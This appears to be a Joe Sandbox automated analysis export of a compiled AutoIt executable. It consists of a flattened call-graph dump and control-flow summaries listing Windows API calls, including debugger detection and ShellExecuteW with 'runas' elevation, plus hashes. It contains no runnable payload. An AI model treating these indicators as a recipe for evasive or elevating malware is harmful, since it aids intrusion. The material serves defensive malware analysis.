98540 df9eed 98560 dfa408 58 API calls 6 library calls 98540->98560 98541 df9f15 98544 df9f1c 98541->98544 98545 df9f2b 98541->98545 98543 df9ef4 98561 df32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98543->98561 98563 df8d68 58 API calls __getptd_noexit 98544->98563 98548 df9e4b __lock 58 API calls 98545->98548 98551 df9f32 98548->98551 98550->98531 98552 df9f3f 98551->98552 98553 df9f57 98551->98553 98564 dfa06b InitializeCriticalSectionAndSpinCount 98552->98564 98565 df2f95 98553->98565 98556 df9f4b 98571 df9f73 RtlLeaveCriticalSection _doexit 98556->98571 98559->98540 98560->98543 
98562->98541 98563->98550 98564->98556 98566 df2f9e RtlFreeHeap 98565->98566 98567 df2fc7 _free 98565->98567 98566->98567 98568 df2fb3 98566->98568 98567->98556 98572 df8d68 58 API calls __getptd_noexit 98568->98572 98570 df2fb9 GetLastError 98570->98567 98571->98550 98572->98570 98573->98518 98574->98519 98575->98523 98579 df9fb5 RtlLeaveCriticalSection 98576->98579 98578 df2ec7 98578->98509 98579->98578 98581 dd77c7 59 API calls 98580->98581 98582 e3ce1a 98581->98582 98583 dd77c7 59 API calls 98582->98583 98584 e3ce23 98583->98584 98585 e3ce37 98584->98585 98878 dd9c9c 59 API calls 98584->98878 98587 dd9997 84 API calls 98585->98587 98588 e3ce54 98587->98588 98589 e3ce76 98588->98589 98590 e3cf55 98588->98590 98595 e3cf85 Mailbox 98588->98595 98591 dd9997 84 API calls 98589->98591 98682 dd4f3d 98590->98682 98593 e3ce82 98591->98593 98596 dd81a7 59 API calls 98593->98596 98595->98433 98601 e3ce8e 98596->98601 98597 dd77c7 59 API calls 98600 e3cfb6 98597->98600 98598 dd4f3d 136 API calls 98599 e3cf81 98598->98599 98599->98595 98599->98597 98602 dd77c7 59 API calls 98600->98602 98603 e3cea2 98601->98603 98604 e3ced4 98601->98604 98605 e3cfbf 98602->98605 98606 dd81a7 59 API calls 98603->98606 98607 dd9997 84 API calls 98604->98607 98608 dd77c7 59 API calls 98605->98608 98609 e3ceb2 98606->98609 98610 e3cee1 98607->98610 98611 e3cfc8 98608->98611 98879 dd7e0b 98609->98879 98613 dd81a7 59 API calls 98610->98613 98614 dd77c7 59 API calls 98611->98614 98616 e3ceed 98613->98616 98617 e3cfd1 98614->98617 98886 e34cd3 GetFileAttributesW 98616->98886 98620 dd9997 84 API calls 98617->98620 98618 dd9997 84 API calls 98622 e3cec8 98618->98622 98621 e3cfde 98620->98621 98706 dd46f9 98621->98706 98625 dd7c8e 59 API calls 98622->98625 98623 e3cef6 98626 e3cf09 98623->98626 98627 dd7b52 59 API calls 98623->98627 98625->98604 98629 dd9997 84 API calls 98626->98629 98635 e3cf0f 98626->98635 98627->98626 98628 e3cff9 98757 dd7b52 98628->98757 98631 e3cf36 98629->98631 98887 e33a2b 75 
API calls Mailbox 98631->98887 98634 e3d03c 98637 dd81a7 59 API calls 98634->98637 98635->98595 98636 dd7b52 59 API calls 98638 e3d019 98636->98638 98639 e3d04a 98637->98639 98638->98634 98888 dd7d2c 98638->98888 98760 dd7c8e 98639->98760 98643 dd7c8e 59 API calls 98645 e3d066 98643->98645 98644 e3d02e 98646 dd7d2c 59 API calls 98644->98646 98647 dd7c8e 59 API calls 98645->98647 98646->98634 98648 e3d074 98647->98648 98649 dd9997 84 API calls 98648->98649 98650 e3d080 98649->98650 98769 e342ad 98650->98769 98652 e3d091 98653 e33e73 3 API calls 98652->98653 98654 e3d09b 98653->98654 98655 dd9997 84 API calls 98654->98655 98658 e3d0cc 98654->98658 98656 e3d0b9 98655->98656 98823 e393df 98656->98823 98659 dd4faa 84 API calls 98658->98659 98659->98595 98661 dd9997 84 API calls 98660->98661 98662 e44787 98661->98662 99635 dd63a0 98662->99635 98664 e44797 98665 e447bc 98664->98665 98666 dda000 331 API calls 98664->98666 98668 e447c0 98665->98668 99660 dd9bf8 59 API calls Mailbox 98665->99660 98666->98665 98668->98433 98670 dd4fb4 98669->98670 98672 dd4fbb 98669->98672 98671 df55d6 __fcloseall 83 API calls 98670->98671 98671->98672 98673 dd4fdb FreeLibrary 98672->98673 98674 dd4fca 98672->98674 98673->98674 98674->98433 99680 e34696 GetFileAttributesW 98675->99680 98678->98431 98679->98433 98680->98428 98681->98429 98897 dd4d13 98682->98897 98687 dd4f68 LoadLibraryExW 98907 dd4cc8 98687->98907 98688 e0dd0f 98689 dd4faa 84 API calls 98688->98689 98691 e0dd16 98689->98691 98693 dd4cc8 3 API calls 98691->98693 98695 e0dd1e 98693->98695 98933 dd506b 98695->98933 98696 dd4f8f 98696->98695 98697 dd4f9b 98696->98697 98699 dd4faa 84 API calls 98697->98699 98701 dd4fa0 98699->98701 98701->98598 98701->98599 98703 e0dd45 98941 dd5027 98703->98941 98707 dd77c7 59 API calls 98706->98707 98708 dd470f 98707->98708 98709 dd77c7 59 API calls 98708->98709 98710 dd4717 98709->98710 98711 dd77c7 59 API calls 98710->98711 98712 dd471f 98711->98712 98713 dd77c7 59 API calls 98712->98713 98714 
dd4727 98713->98714 98715 dd475b 98714->98715 98716 e0d8fb 98714->98716 98717 dd79ab 59 API calls 98715->98717 98718 dd81a7 59 API calls 98716->98718 98719 dd4769 98717->98719 98720 e0d904 98718->98720 99241 dd7e8c 98719->99241 99245 dd7eec 98720->99245 98723 dd4773 98724 dd79ab 59 API calls 98723->98724 98725 dd479e 98723->98725 98727 dd4794 98724->98727 98728 dd47bd 98725->98728 98729 e0d924 98725->98729 98743 dd47de 98725->98743 98731 dd7e8c 59 API calls 98727->98731 98733 dd7b52 59 API calls 98728->98733 98732 e0d9f4 98729->98732 98740 e0d9dd 98729->98740 98751 e0d95b 98729->98751 98730 dd47ef 98735 dd4801 98730->98735 98737 dd81a7 59 API calls 98730->98737 98731->98725 98736 dd7d2c 59 API calls 98732->98736 98734 dd47c7 98733->98734 98738 dd79ab 59 API calls 98734->98738 98734->98743 98739 dd81a7 59 API calls 98735->98739 98741 dd4811 98735->98741 98752 e0d9b1 98736->98752 98737->98735 98738->98743 98739->98741 98740->98732 98748 e0d9c8 98740->98748 98742 dd4818 98741->98742 98744 dd81a7 59 API calls 98741->98744 98745 dd81a7 59 API calls 98742->98745 98754 dd481f Mailbox 98742->98754 99228 dd79ab 98743->99228 98744->98742 98745->98754 98746 dd7b52 59 API calls 98746->98752 98747 e0d9b9 98749 dd7d2c 59 API calls 98747->98749 98750 dd7d2c 59 API calls 98748->98750 98749->98752 98750->98752 98751->98747 98755 e0d9a4 98751->98755 98752->98743 98752->98746 99249 dd7a84 59 API calls 2 library calls 98752->99249 98754->98628 98756 dd7d2c 59 API calls 98755->98756 98756->98752 98758 dd7faf 59 API calls 98757->98758 98759 dd7b5d 98758->98759 98759->98634 98759->98636 98761 e0f094 98760->98761 98762 dd7ca0 98760->98762 99260 e28123 59 API calls _memmove 98761->99260 99254 dd7bb1 98762->99254 98765 dd7cac 98765->98643 98766 e0f09e 98767 dd81a7 59 API calls 98766->98767 98768 e0f0a6 Mailbox 98767->98768 98770 e342c9 98769->98770 98771 e342ce 98770->98771 98772 e342dc 98770->98772 98774 dd81a7 59 API calls 98771->98774 98773 dd77c7 59 API calls 98772->98773 98775 e342e4 
98773->98775 98776 e342d7 Mailbox 98774->98776 98777 dd77c7 59 API calls 98775->98777 98776->98652 98778 e342ec 98777->98778 98779 dd77c7 59 API calls 98778->98779 98780 e342f7 98779->98780 98781 dd77c7 59 API calls 98780->98781 98782 e342ff 98781->98782 98783 dd77c7 59 API calls 98782->98783 98784 e34307 98783->98784 98785 dd77c7 59 API calls 98784->98785 98786 e3430f 98785->98786 98787 dd77c7 59 API calls 98786->98787 98788 e34317 98787->98788 98789 dd77c7 59 API calls 98788->98789 98790 e3431f 98789->98790 98791 dd46f9 59 API calls 98790->98791 98792 e34336 98791->98792 98793 dd46f9 59 API calls 98792->98793 98794 e3434f 98793->98794 98795 dd7b52 59 API calls 98794->98795 98796 e3435b 98795->98796 98797 e3436e 98796->98797 98798 dd7e8c 59 API calls 98796->98798 98799 dd7b52 59 API calls 98797->98799 98798->98797 98800 e34377 98799->98800 98801 e34387 98800->98801 98802 dd7e8c 59 API calls 98800->98802 98803 dd81a7 59 API calls 98801->98803 98802->98801 98804 e34393 98803->98804 98805 dd7c8e 59 API calls 98804->98805 98806 e3439f 98805->98806 99261 e3445f 59 API calls 98806->99261 98808 e343ae 99262 e3445f 59 API calls 98808->99262 98810 e343c1 98811 dd7b52 59 API calls 98810->98811 98812 e343cb 98811->98812 98813 e343e2 98812->98813 98814 e343d0 98812->98814 98816 dd7b52 59 API calls 98813->98816 98815 dd7e0b 59 API calls 98814->98815 98817 e343dd 98815->98817 98818 e343eb 98816->98818 98821 dd7c8e 59 API calls 98817->98821 98819 e34409 98818->98819 98820 dd7e0b 59 API calls 98818->98820 98822 dd7c8e 59 API calls 98819->98822 98820->98817 98821->98819 98822->98776 98824 e393ec __ftell_nolock 98823->98824 98825 df0ff6 Mailbox 59 API calls 98824->98825 98826 e39449 98825->98826 98827 dd538e 59 API calls 98826->98827 98828 e39453 98827->98828 98829 e391e9 GetSystemTimeAsFileTime 98828->98829 98830 e3945e 98829->98830 98831 dd5045 85 API calls 98830->98831 98832 e39471 _wcscmp 98831->98832 98833 e39542 98832->98833 98834 e39495 98832->98834 98835 e399be 96 API calls 
98833->98835 99293 e399be 98834->99293 98851 e3950e _wcscat 98835->98851 98839 dd506b 74 API calls 98841 e39567 98839->98841 98840 e3954b 98840->98658 98842 dd506b 74 API calls 98841->98842 98844 e39577 98842->98844 98843 e394c3 _wcscat _wcscpy 99300 df432e 58 API calls __wsplitpath_helper 98843->99300 98845 dd506b 74 API calls 98844->98845 98847 e39592 98845->98847 98848 dd506b 74 API calls 98847->98848 98849 e395a2 98848->98849 98850 dd506b 74 API calls 98849->98850 98852 e395bd 98850->98852 98851->98839 98851->98840 98853 dd506b 74 API calls 98852->98853 98854 e395cd 98853->98854 98855 dd506b 74 API calls 98854->98855 98856 e395dd 98855->98856 98857 dd506b 74 API calls 98856->98857 98858 e395ed 98857->98858 99263 e39b6d GetTempPathW GetTempFileNameW 98858->99263 98860 e395f9 98861 df548b 115 API calls 98860->98861 98872 e3960a 98861->98872 98862 e396c4 99277 df55d6 98862->99277 98864 e396cf 98866 e396d5 DeleteFileW 98864->98866 98867 e396e9 98864->98867 98865 dd506b 74 API calls 98865->98872 98866->98840 98868 e3978f CopyFileW 98867->98868 98873 e396f3 _wcsncpy 98867->98873 98869 e397b7 DeleteFileW 98868->98869 98870 e397a5 DeleteFileW 98868->98870 99290 e39b2c CreateFileW 98869->99290 98870->98840 98872->98840 98872->98862 98872->98865 99264 df4a93 98872->99264 99301 e38d90 98873->99301 98877 e3977e DeleteFileW 98877->98840 98878->98585 98880 dd7e1f 98879->98880 98881 e0f173 98879->98881 99629 dd7db0 98880->99629 98883 dd8189 59 API calls 98881->98883 98885 e0f17e __wsetenvp _memmove 98883->98885 98884 dd7e2a 98884->98618 98886->98623 98887->98635 98889 dd7d38 __wsetenvp 98888->98889 98890 dd7da5 98888->98890 98892 dd7d4e 98889->98892 98893 dd7d73 98889->98893 98891 dd7e8c 59 API calls 98890->98891 98896 dd7d56 _memmove 98891->98896 99634 dd8087 59 API calls Mailbox 98892->99634 98895 dd8189 59 API calls 98893->98895 98895->98896 98896->98644 98946 dd4d61 98897->98946 98900 dd4d3a 98901 dd4d4a FreeLibrary 98900->98901 98902 dd4d53 98900->98902 98901->98902 
98904 df548b 98902->98904 98903 dd4d61 2 API calls 98903->98900 98950 df54a0 98904->98950 98906 dd4f5c 98906->98687 98906->98688 99031 dd4d94 98907->99031 98910 dd4d94 2 API calls 98913 dd4ced 98910->98913 98911 dd4cff FreeLibrary 98912 dd4d08 98911->98912 98914 dd4dd0 98912->98914 98913->98911 98913->98912 98915 df0ff6 Mailbox 59 API calls 98914->98915 98916 dd4de5 98915->98916 99035 dd538e 98916->99035 98918 dd4df1 _memmove 98920 dd4ee9 98918->98920 98921 dd4f21 98918->98921 98924 dd4e2c 98918->98924 98919 dd5027 69 API calls 98929 dd4e35 98919->98929 99038 dd4fe9 CreateStreamOnHGlobal 98920->99038 99049 e39ba5 95 API calls 98921->99049 98924->98919 98925 dd506b 74 API calls 98925->98929 98927 dd4ec9 98927->98696 98928 e0dcd0 98930 dd5045 85 API calls 98928->98930 98929->98925 98929->98927 98929->98928 99044 dd5045 98929->99044 98931 e0dce4 98930->98931 98932 dd506b 74 API calls 98931->98932 98932->98927 98934 dd507d 98933->98934 98935 e0ddf6 98933->98935 99073 df5812 98934->99073 98938 e39393 99205 e391e9 98938->99205 98940 e393a9 98940->98703 98942 e0ddb9 98941->98942 98943 dd5036 98941->98943 99210 df5e90 98943->99210 98945 dd503e 98947 dd4d2e 98946->98947 98948 dd4d6a LoadLibraryA 98946->98948 98947->98900 98947->98903 98948->98947 98949 dd4d7b GetProcAddress 98948->98949 98949->98947 98953 df54ac __tzset_nolock 98950->98953 98951 df54bf 98999 df8d68 58 API calls __getptd_noexit 98951->98999 98953->98951 98955 df54f0 98953->98955 98954 df54c4 99000 df8ff6 9 API calls __cftof_l 98954->99000 98969 e00738 98955->98969 98958 df54f5 98959 df54fe 98958->98959 98960 df550b 98958->98960 99001 df8d68 58 API calls __getptd_noexit 98959->99001 98962 df5535 98960->98962 98963 df5515 98960->98963 98984 e00857 98962->98984 99002 df8d68 58 API calls __getptd_noexit 98963->99002 98964 df54cf __tzset_nolock @_EH4_CallFilterFunc@8 98964->98906 98970 e00744 __tzset_nolock 98969->98970 98971 df9e4b __lock 58 API calls 98970->98971 98972 e00752 98971->98972 98973 e007cd 
98972->98973 98978 df9ed3 __mtinitlocknum 58 API calls 98972->98978 98982 e007c6 98972->98982 99007 df6e8d 59 API calls __lock 98972->99007 99008 df6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98972->99008 99009 df8a5d 58 API calls 2 library calls 98973->99009 98976 e007d4 98976->98982 99010 dfa06b InitializeCriticalSectionAndSpinCount 98976->99010 98978->98972 98980 e00843 __tzset_nolock 98980->98958 98981 e007fa RtlEnterCriticalSection 98981->98982 99004 e0084e 98982->99004 98992 e00877 __wopenfile 98984->98992 98985 e00891 99015 df8d68 58 API calls __getptd_noexit 98985->99015 98987 e00896 99016 df8ff6 9 API calls __cftof_l 98987->99016 98989 e00a4c 98989->98985 98991 e00aaf 98989->98991 98990 df5540 99003 df5562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 98990->99003 99012 e087f1 98991->99012 98992->98985 98992->98989 99017 df3a0b 60 API calls 2 library calls 98992->99017 98995 e00a45 98995->98989 99018 df3a0b 60 API calls 2 library calls 98995->99018 98997 e00a64 98997->98989 99019 df3a0b 60 API calls 2 library calls 98997->99019 98999->98954 99000->98964 99001->98964 99002->98964 99003->98964 99011 df9fb5 RtlLeaveCriticalSection 99004->99011 99006 e00855 99006->98980 99007->98972 99008->98972 99009->98976 99010->98981 99011->99006 99020 e07fd5 99012->99020 99014 e0880a 99014->98990 99015->98987 99016->98990 99017->98995 99018->98997 99019->98989 99022 e07fe1 __tzset_nolock 99020->99022 99021 e07ff7 99023 df8d68 __cftof_l 58 API calls 99021->99023 99022->99021 99024 e0802d 99022->99024 99025 e07ffc 99023->99025 99026 e0809e __wsopen_nolock 109 API calls 99024->99026 99027 df8ff6 __cftof_l 9 API calls 99025->99027 99028 e08049 99026->99028 99030 e08006 __tzset_nolock 99027->99030 99029 e08072 __wsopen_helper RtlLeaveCriticalSection 99028->99029 99029->99030 99030->99014 99032 dd4ce1 99031->99032 99033 dd4d9d LoadLibraryA 99031->99033 99032->98910 99032->98913 99033->99032 99034 dd4dae GetProcAddress 99033->99034 99034->99032 99036 
df0ff6 Mailbox 59 API calls 99035->99036 99037 dd53a0 99036->99037 99037->98918 99039 dd5003 FindResourceExW 99038->99039 99043 dd5020 99038->99043 99040 e0dd5c LoadResource 99039->99040 99039->99043 99041 e0dd71 SizeofResource 99040->99041 99040->99043 99042 e0dd85 LockResource 99041->99042 99041->99043 99042->99043 99043->98924 99045 dd5054 99044->99045 99048 e0ddd4 99044->99048 99050 df5a7d 99045->99050 99047 dd5062 99047->98929 99049->98924 99051 df5a89 __tzset_nolock 99050->99051 99052 df5a9b 99051->99052 99054 df5ac1 99051->99054 99063 df8d68 58 API calls __getptd_noexit 99052->99063 99065 df6e4e 99054->99065 99055 df5aa0 99064 df8ff6 9 API calls __cftof_l 99055->99064 99060 df5ad6 99072 df5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99060->99072 99062 df5aab __tzset_nolock 99062->99047 99063->99055 99064->99062 99066 df6e5e 99065->99066 99067 df6e80 RtlEnterCriticalSection 99065->99067 99066->99067 99069 df6e66 99066->99069 99068 df5ac7 99067->99068 99071 df59ee 83 API calls 5 library calls 99068->99071 99070 df9e4b __lock 58 API calls 99069->99070 99070->99068 99071->99060 99072->99062 99076 df582d 99073->99076 99075 dd508e 99075->98938 99077 df5839 __tzset_nolock 99076->99077 99078 df587c 99077->99078 99080 df584f _memset 99077->99080 99088 df5874 __tzset_nolock 99077->99088 99079 df6e4e __lock_file 59 API calls 99078->99079 99081 df5882 99079->99081 99103 df8d68 58 API calls __getptd_noexit 99080->99103 99089 df564d 99081->99089 99084 df5869 99104 df8ff6 9 API calls __cftof_l 99084->99104 99088->99075 99093 df5668 _memset 99089->99093 99095 df5683 99089->99095 99090 df5673 99201 df8d68 58 API calls __getptd_noexit 99090->99201 99092 df5678 99202 df8ff6 9 API calls __cftof_l 99092->99202 99093->99090 99093->99095 99100 df56c3 99093->99100 99105 df58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99095->99105 99097 df57d4 _memset 99204 df8d68 58 API calls __getptd_noexit 99097->99204 99100->99095 99100->99097 99106 df4916 
99100->99106 99113 e010ab 99100->99113 99181 e00df7 99100->99181 99203 e00f18 58 API calls 3 library calls 99100->99203 99103->99084 99104->99088 99105->99088 99107 df4935 99106->99107 99108 df4920 99106->99108 99107->99100 99109 df8d68 __cftof_l 58 API calls 99108->99109 99110 df4925 99109->99110 99111 df8ff6 __cftof_l 9 API calls 99110->99111 99112 df4930 99111->99112 99112->99100 99114 e010e3 99113->99114 99115 e010cc 99113->99115 99117 e0181b 99114->99117 99122 e0111d 99114->99122 99116 df8d34 __write 58 API calls 99115->99116 99118 e010d1 99116->99118 99119 df8d34 __write 58 API calls 99117->99119 99121 df8d68 __cftof_l 58 API calls 99118->99121 99120 e01820 99119->99120 99123 df8d68 __cftof_l 58 API calls 99120->99123 99161 e010d8 99121->99161 99124 e01125 99122->99124 99130 e0113c 99122->99130 99125 e01131 99123->99125 99126 df8d34 __write 58 API calls 99124->99126 99128 df8ff6 __cftof_l 9 API calls 99125->99128 99127 e0112a 99126->99127 99131 df8d68 __cftof_l 58 API calls 99127->99131 99128->99161 99129 e01151 99132 df8d34 __write 58 API calls 99129->99132 99130->99129 99133 e0116b 99130->99133 99134 e01189 99130->99134 99130->99161 99131->99125 99132->99127 99133->99129 99138 e01176 99133->99138 99135 df8a5d __malloc_crt 58 API calls 99134->99135 99136 e01199 99135->99136 99139 e011a1 99136->99139 99140 e011bc 99136->99140 99137 e05ebb __flswbuf 58 API calls 99141 e0128a 99137->99141 99138->99137 99142 df8d68 __cftof_l 58 API calls 99139->99142 99144 e01b11 __lseeki64_nolock 60 API calls 99140->99144 99143 e01303 ReadFile 99141->99143 99148 e012a0 GetConsoleMode 99141->99148 99145 e011a6 99142->99145 99146 e017e3 GetLastError 99143->99146 99147 e01325 99143->99147 99144->99138 99149 df8d34 __write 58 API calls 99145->99149 99150 e017f0 99146->99150 99151 e012e3 99146->99151 99147->99146 99155 e012f5 99147->99155 99152 e01300 99148->99152 99153 e012b4 99148->99153 99149->99161 99154 df8d68 __cftof_l 58 API calls 99150->99154 99159 df8d47 __dosmaperr 58 API 
calls 99151->99159 99163 e012e9 99151->99163 99152->99143 99153->99152 99156 e012ba ReadConsoleW 99153->99156 99157 e017f5 99154->99157 99155->99163 99164 e0135a 99155->99164 99170 e015c7 99155->99170 99156->99155 99158 e012dd GetLastError 99156->99158 99160 df8d34 __write 58 API calls 99157->99160 99158->99151 99159->99163 99160->99163 99161->99100 99162 df2f95 _free 58 API calls 99162->99161 99163->99161 99163->99162 99166 e013c6 ReadFile 99164->99166 99172 e01447 99164->99172 99167 e013e7 GetLastError 99166->99167 99177 e013f1 99166->99177 99167->99177 99168 e01504 99176 e01b11 __lseeki64_nolock 60 API calls 99168->99176 99178 e014b4 MultiByteToWideChar 99168->99178 99169 e014f4 99173 df8d68 __cftof_l 58 API calls 99169->99173 99170->99163 99171 e016cd ReadFile 99170->99171 99174 e016f0 GetLastError 99171->99174 99175 e016fe 99171->99175 99172->99163 99172->99168 99172->99169 99172->99178 99173->99163 99174->99175 99175->99170 99180 e01b11 __lseeki64_nolock 60 API calls 99175->99180 99176->99178 99177->99164 99179 e01b11 __lseeki64_nolock 60 API calls 99177->99179 99178->99158 99178->99163 99179->99177 99180->99175 99182 e00e02 99181->99182 99185 e00e17 99181->99185 99183 df8d68 __cftof_l 58 API calls 99182->99183 99184 e00e07 99183->99184 99186 df8ff6 __cftof_l 9 API calls 99184->99186 99187 e00e4c 99185->99187 99188 e06234 __getbuf 58 API calls 99185->99188 99193 e00e12 99185->99193 99186->99193 99189 df4916 __flswbuf 58 API calls 99187->99189 99188->99187 99190 e00e60 99189->99190 99191 e00f97 __read 72 API calls 99190->99191 99192 e00e67 99191->99192 99192->99193 99194 df4916 __flswbuf 58 API calls 99192->99194 99193->99100 99195 e00e8a 99194->99195 99195->99193 99196 df4916 __flswbuf 58 API calls 99195->99196 99197 e00e96 99196->99197 99197->99193 99198 df4916 __flswbuf 58 API calls 99197->99198 99199 e00ea3 99198->99199 99200 df4916 __flswbuf 58 API calls 99199->99200 99200->99193 99201->99092 99202->99095 99203->99100 99204->99092 99208 df543a 
100884->100887 100886 ee8244 100885->100886 100886->100886 100888 dd3633 100889 dd366a 100888->100889 100890 dd3688 100889->100890 100891 dd36e7 100889->100891 100928 dd36e5 100889->100928 100895 dd375d PostQuitMessage 100890->100895 100896 dd3695 100890->100896 100893 dd36ed 100891->100893 100894 e0d31c 100891->100894 100892 dd36ca NtdllDefWindowProc_W 100930 dd36d8 100892->100930 100897 dd3715 SetTimer RegisterClipboardFormatW 100893->100897 100898 dd36f2 100893->100898 100938 de11d0 10 API calls Mailbox 100894->100938 100895->100930 100899 dd36a0 100896->100899 100900 e0d38f 100896->100900 100905 dd373e CreatePopupMenu 100897->100905 100897->100930 100903 dd36f9 KillTimer 100898->100903 100904 e0d2bf 100898->100904 100906 dd36a8 100899->100906 100907 dd3767 100899->100907 100942 e32a16 71 API calls _memset 100900->100942 100902 e0d343 100939 de11f3 331 API calls Mailbox 100902->100939 100933 dd44cb Shell_NotifyIconW _memset 100903->100933 100912 e0d2c4 100904->100912 100913 e0d2f8 MoveWindow 100904->100913 100905->100930 100915 e0d374 100906->100915 100916 dd36b3 100906->100916 100936 dd4531 64 API calls _memset 100907->100936 100909 e0d3a1 100909->100892 100909->100930 100918 e0d2e7 SetFocus 100912->100918 100919 e0d2c8 100912->100919 100913->100930 100915->100892 100941 e2817e 59 API calls Mailbox 100915->100941 100917 dd374b 100916->100917 100926 dd36be 100916->100926 100935 dd45df 81 API calls _memset 100917->100935 100918->100930 100922 e0d2d1 100919->100922 100919->100926 100920 dd370c 100934 dd3114 DeleteObject DestroyWindow Mailbox 100920->100934 100937 de11d0 10 API calls Mailbox 100922->100937 100925 dd375b 100925->100930 100926->100892 100940 dd44cb Shell_NotifyIconW _memset 100926->100940 100928->100892 100931 e0d368 100932 dd43db 68 API calls 100931->100932 100932->100928 100933->100920 100934->100930 100935->100925 100936->100925 100937->100930 100938->100902 100939->100926 100940->100931 100941->100928 100942->100909

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD3B7A
                                          • IsDebuggerPresent.KERNEL32 ref: 00DD3B8C
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E962F8,00E962E0,?,?), ref: 00DD3BFD
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00DE0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DD3C26,00E962F8,?,?,?), ref: 00DE0ACE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD3C81
                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00E893F0,00000010), ref: 00E0D4BC
                                          • SetCurrentDirectoryW.KERNEL32(?,00E962F8,?,?,?), ref: 00E0D4F4
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E85D40,00E962F8,?,?,?), ref: 00E0D57A
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00E0D581
                                            • Part of subcall function 00DD3A58: GetSysColorBrush.USER32(0000000F), ref: 00DD3A62
                                            • Part of subcall function 00DD3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00DD3A71
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(00000063), ref: 00DD3A88
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(000000A4), ref: 00DD3A9A
                                            • Part of subcall function 00DD3A58: LoadIconW.USER32(000000A2), ref: 00DD3AAC
                                            • Part of subcall function 00DD3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DD3AD2
                                            • Part of subcall function 00DD3A58: RegisterClassExW.USER32(?), ref: 00DD3B28
                                            • Part of subcall function 00DD39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DD3A15
                                            • Part of subcall function 00DD39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DD3A36
                                            • Part of subcall function 00DD39E7: ShowWindow.USER32(00000000,?,?), ref: 00DD3A4A
                                            • Part of subcall function 00DD39E7: ShowWindow.USER32(00000000,?,?), ref: 00DD3A53
                                            • Part of subcall function 00DD43DB: _memset.LIBCMT ref: 00DD4401
                                            • Part of subcall function 00DD43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DD44A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: This is a third-party compiled AutoIt script.$runas$%
                                          • API String ID: 529118366-3343222573
                                          • Opcode ID: 002d8b3b179638beb998daf1d371a007d249ae8b74e495d18f8f3ec72a53c755
                                          • Instruction ID: 89147ae250293db9e15472998b3fc262c07d2566b4ff31dc4c3d351fa68dfc6c
                                          • Opcode Fuzzy Hash: 002d8b3b179638beb998daf1d371a007d249ae8b74e495d18f8f3ec72a53c755
                                          • Instruction Fuzzy Hash: 9D51E470A18349AECF15ABF5DC06AFD7B78EB44340F0450A7F455B62A2DA709A49CB31

                                          Control-flow Graph

                                          APIs
                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00DD36D2
                                          • KillTimer.USER32(?,00000001), ref: 00DD36FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DD371F
                                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00DD372A
                                          • CreatePopupMenu.USER32 ref: 00DD373E
                                          • PostQuitMessage.USER32(00000000), ref: 00DD375F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
